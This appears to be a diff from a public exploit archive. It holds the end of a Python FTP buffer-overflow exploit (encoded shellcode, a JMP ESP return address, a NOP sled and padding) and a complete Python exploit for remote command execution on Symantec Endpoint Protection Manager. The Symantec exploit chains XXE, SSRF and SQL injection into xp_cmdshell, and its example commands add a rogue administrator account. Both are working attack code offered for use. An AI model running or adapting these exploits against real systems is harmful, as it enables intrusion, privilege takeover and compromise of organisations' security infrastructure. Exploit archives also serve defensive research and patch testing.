"\xa8\x3a\xf8\x81\x2f\xee\x72\xbd\xa4\x11\x55\x37\xfe\x35" +
"\x71\x13\xa5\x54\x20\xf9\x08\x68\x32\xa5\xf5\xcc\x38\x44" +
"\xe2\x77\x63\x01\xc7\x45\x9c\xd1\x4f\xdd\xef\xe3\xd0\x75" +
"\x78\x48\x99\x53\x7f\xaf\xb0\x24\xef\x4e\x3a\x55\x39\x95" +
"\x6e\x05\x51\x3c\x0e\xce\xa1\xc1\xdb\x41\xf2\x6d\xb3\x21" +
"\xa2\xcd\x63\xca\xa8\xc1\x5c\xea\xd2\x0b\xeb\x2c\x1d\x6f" +
"\xb8\xda\x5c\x8f\x2f\x47\xe8\x69\x25\x67\xbc\x22\xd1\x45" +
"\x9b\xfa\x46\xb5\xc9\x56\xdf\x21\x45\xb1\xe7\x4e\x56\x97" +
"\x44\xe2\xfe\x70\x1e\xe8\x3a\x60\x21\x25\x6b\xeb\x1a\xae" +
"\xe1\x85\xe9\x4e\xf5\x8f\x99\xf3\x64\x54\x59\x7d\x95\xc3" +
"\x0e\x2a\x6b\x1a\xda\xc6\xd2\xb4\xf8\x1a\x82\xff\xb8\xc0" +
"\x77\x01\x41\x84\xcc\x25\x51\x50\xcc\x61\x05\x0c\x9b\x3f" +
"\xf3\xea\x75\x8e\xad\xa4\x2a\x58\x39\x30\x01\x5b\x3f\x3d" +
"\x4c\x2d\xdf\x8c\x39\x68\xe0\x21\xae\x7c\x99\x5f\x4e\x82" +
"\x70\xe4\x7e\xc9\xd8\x4d\x17\x94\x89\xcf\x7a\x27\x64\x13" +
"\x83\xa4\x8c\xec\x70\xb4\xe5\xe9\x3d\x72\x16\x80\x2e\x17" +
"\x18\x37\x4e\x32")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 21))
nop = '\x90'*50
eip = '\x53\x93\x42\x7E' # EIP = 7E429353; JMP ESP in USER32.dll
myip = s.getsockname()[0]
padding = 'A' * (2029 - (len(d) + len(myip)))
buf = padding + eip + nop + shellcode
s.send('%s\r\n' % (buf))
s.recv(1024)
print 'Payload sent'
s.close()

83
platforms/windows/remote/31853.py Executable file
View file

@ -0,0 +1,83 @@
import argparse
import httplib
"""
Exploit Title: Symantec Endpoint Protection Manager Remote Command Execution
Exploit Author: Chris Graham @cgrahamseven
CVE: CVE-2013-5014, CVE-2013-5015
Date: February 22, 2014
Vendor Homepage: http://www.symantec.com/endpoint-protection
Version: 11.0, 12.0, 12.1
Tested On: Windows Server 2003, default SEPM install using embedded database
References: https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20140213_00
Details:
First off, this was a fantastic discovery by Stefan Viehbock. The abuse of the XXE
injection to force SEPM to exploit itself through a separate SQL injection flaw was
particularly amusing. I suspect the majority of SEPM users will have it configured
with the default embedded database, thereby making this a pretty reliable exploit.
So basically what you are looking for with the XXE injection is a vulnerability
that can be triggered in the ConsoleServlet. When a multipart http request is sent,
the servlet will use a custom MultipartParser class to handle the individual
multipart bodies. When a body is encountered that uses a Content-Type of text/xml,
the Java DocumentBuilder class is used to parse the xml. Since Symantec did not
disallow declared DTD processing, it is vulnerable to the XXE injection. This
appears to be a blind XXE, so a better use of the vulnerability is use it for SSRF.
That leads us to the SQL injection flaw.
Symantec has an http request handler called ConfigServerHandler that is programmatically
restricted to only handle requests that come from localhost. I guess when they wrote this
they just assumed that there was never going to be a way to send untrusted input to it
since it was always going to be controlled by them. I base this guess on the fact that
there is absolutely no attempt made to validate what input comes in to the
updateReportingVersion function which shoves it directly into a SQL query unfiltered. In
order to trigger the SQL injection you just need to send the SQL injection string in the
"Parameter" url param with the "action" param set to test_av. On a default install of SEPM,
it uses a SQL Anywhere embedded database. Much like MSSQL, SQL Anywhere has an xp_cmdshell
stored procedure to run local OS commands. Using this stored procedure, you can compromise
the server that is running SEPM.
Example Usage:
python sepm_xxe_exploit.py -t 192.168.1.100 -c "net user myadmin p@ss!23 /add"
python sepm_xxe_exploit.py -t 192.168.1.100 -c "net localgroup Administrators myadmin /add"
"""
multipart_body = \
"------=_Part_156_33010715.1234\r\n" + \
"Content-Type: text/xml\r\n" + \
"Content-Disposition: form-data; name=\"Content\"\r\n\r\n" + \
"<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n" + \
"<!DOCTYPE sepm [<!ENTITY payload SYSTEM " + \
"\"http://127.0.0.1:9090/servlet/ConsoleServlet?ActionType=ConfigServer&action=test_av" + \
"&SequenceNum=140320121&Parameter=a'; call xp_cmdshell('%s');--\" >]>\r\n" + \
"<request>\r\n" + \
"<xxe>&payload;</xxe>\r\n" + \
"</request>\r\n" + \
"------=_Part_156_33010715.1234--\r\n"
headers = {'Content-Type':"multipart/form-data; boundary=\"----=_Part_156_33010715.1234\""}
cmdline_parser = argparse.ArgumentParser(description='Symantec Endpoint Protection Manager' + \
' Remote Command Execution')
cmdline_parser.add_argument('-t', dest='ip', help='Target IP', required=True)
cmdline_parser.add_argument('-p', dest='port', help='Target Port', default=9090, \
type=int, required=False)
cmdline_parser.add_argument('-ssl', dest='ssl', help='Uses SSL (set to 1 for true)', \
default=0, type=int, required=False)
cmdline_parser.add_argument('-c', dest='cmd', help='Windows cmd to run (must be in quotes ie "net user")', \
required=True)
args = cmdline_parser.parse_args()
if args.ssl == 1:
conn = httplib.HTTPSConnection(args.ip, args.port)
else:
conn = httplib.HTTPConnection(args.ip, args.port)
multipart_body = multipart_body % (args.cmd)
print "\n[*]Attempting to exploit XXE and run local windows command: " + args.cmd
conn.request("POST", "/servlet/ConsoleServlet?ActionType=ConsoleLog", multipart_body, headers)
res = conn.getresponse()
if res.status != 200:
print "[-]Exploit unsuccessful! Server returned:\n" + res.read()
else:
print "[+]Exploit successfully sent!"